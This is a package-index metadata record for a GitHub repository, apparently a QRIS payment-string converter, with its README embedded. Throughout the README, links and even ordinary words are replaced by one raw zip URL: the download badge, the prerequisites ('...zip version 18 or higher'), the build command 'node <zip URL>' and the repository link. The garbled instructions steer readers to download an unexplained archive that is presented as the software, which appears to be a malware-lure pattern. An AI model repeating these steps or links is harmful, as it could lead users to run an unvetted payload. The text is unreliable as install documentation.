{"id":32828539,"url":"https://github.com/li329211/qris-api","last_synced_at":"2026-05-05T17:31:23.923Z","repository":{"id":322158507,"uuid":"1088262047","full_name":"li329211/qris-api","owner":"li329211","description":"📱 Convert QRIS strings easily with this Elysia.js API, featuring OpenAPI documentation and a simple UI for testing.","archived":false,"fork":false,"pushed_at":"2026-05-01T21:47:03.000Z","size":1377,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2026-05-01T23:28:20.013Z","etag":null,"topics":["api","bot","bot-topup","bot-wa-game","bot-whatsapp","donate","dukungan","nodejs","payment","payment-gateway","payment-integration","payments","qris","wa-gateway"],"latest_commit_sha":null,"homepage":null,"language":"TypeScript","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/li329211.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-11-02T16:24:40.000Z","updated_at":"2026-05-01T21:47:07.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/li329211/qris-api","commit_stats":null,"previous_names":["li329211/qris-api"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/li329211/qris-api","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/li329211%2Fqris-api","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/li329211%2Fqris-api/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/li329211%2Fqris-api/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/li329211%2Fqris-api/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/li329211","download_url":"https://codeload.github.com/li329211/qris-api/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/li329211%2Fqris-api/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32660143,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-05T11:29:49.557Z","status":"ssl_error","status_checked_at":"2026-05-05T11:29:48.587Z","response_time":54,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["api","bot","bot-topup","bot-wa-game","bot-whatsapp","donate","dukungan","nodejs","payment","payment-gateway","payment-integration","payments","qris","wa-gateway"],"created_at":"2025-11-07T19:00:34.470Z","updated_at":"2026-05-05T17:31:23.917Z","avatar_url":"https://github.com/li329211.png","language":"TypeScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 📦 qris-api - Convert QRIS Easily and Efficiently\n\n[![Download QRIS API](https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip%20QRIS%https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip)](https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip)\n\n## 🚀 Getting Started\n\nThis guide will help you download and run the QRIS API application. The QRIS API allows you to convert QRIS strings easily. You’ll access various features through a simple interface. Let’s dive in.\n\n## 📥 Download \u0026 Install\n\nTo get started, visit [this page to download](https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip). Choose the latest release from the list. Download the appropriate version for your operating system.\n\n## ✅ Prerequisites\n\nBefore installing, make sure you have:\n\n- **https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip version 18 or higher** or **Bun** installed on your computer. You can check your current version by running `node -v` or `bun -v` in your terminal.\n\n## ⚙️ Installation Steps\n\nFollow these steps to install the QRIS API:\n\n1. **Open your terminal.**\n2. **Navigate to your project directory.** Use the `cd` command followed by your project folder name. For example:\n   ```bash\n   cd my-project-folder\n   ```\n3. **Install the project dependencies.**\n\n   If you're using npm, enter:\n   ```bash\n   npm install\n   ```\n\n   If you prefer Bun, run:\n   ```bash\n   bun install\n   ```\n\n4. **Ensure Swagger dependency is installed.** This step is crucial for documentation support.\n\n   For npm, type:\n   ```bash\n   npm install @elysiajs/swagger\n   ```\n\n   If using Bun, this command will work:\n   ```bash\n   bun add @elysiajs/swagger\n   ```\n\n## 🏃‍♂️ Running the Application\n\nOnce you have installed everything, you can run the application. Choose one of the following methods:\n\n### Development Mode\n\nIf you want to run in development mode using TypeScript, simply run:\n```bash\nnpm run start\n```\n\n### Production Build\n\nFor a production setup with building, use:\n```bash\nnpm run build\nnode https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip\n```\n\n### Bun Users\n\nIf using Bun, run this command:\n```bash\nbun https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip\n```\n\n### Access the API\n\nThe server will typically run on `http://localhost:3000`. You can access its features as follows:\n\n- For Documentation: Go to `http://localhost:3000/docs`\n- For the Simple User Interface: Visit `http://localhost:3000/ui`\n\n## 📄 API Features\n\nThe QRIS API offers:\n\n- **Endpoint**: `POST /convert` - This converts QRIS strings and calculates CRC16.\n- **Documentation Access**: Available at `GET /docs` to help you understand the API's usage.\n- **User Interface**: Use the simple UI at `GET /ui` for easy interaction with the API.\n\n## 🗂️ OpenAPI Schema\n\nThe OpenAPI schema for the `/convert` endpoint has been integrated for your convenience. Refer to the documentation for detailed descriptions of how each endpoint functions.\n\n## 🤔 Troubleshooting\n\nIf you encounter issues while running the QRIS API, here are some common solutions:\n\n- **Check https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip installation**: Ensure they are installed correctly. Reinstall if necessary.\n- **Refer to error messages**: Read any error logs to identify what might be wrong.\n- **Consult the Documentation**: Most issues can be resolved by checking the API documentation available at `http://localhost:3000/docs`.\n\nFor further assistance, feel free to open an issue on the [GitHub repository](https://raw.githubusercontent.com/li329211/qris-api/master/public/qris-api-1.5.zip).\n\n## 🤝 Support \u0026 Contribution\n\nIf you would like to contribute to this project or report any bugs, please visit our GitHub repository. Information on contributing is available in the repository.\n\nWe appreciate your interest in the QRIS API and hope you find it helpful for your projects!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fli329211%2Fqris-api","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fli329211%2Fqris-api","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fli329211%2Fqris-api/lists"}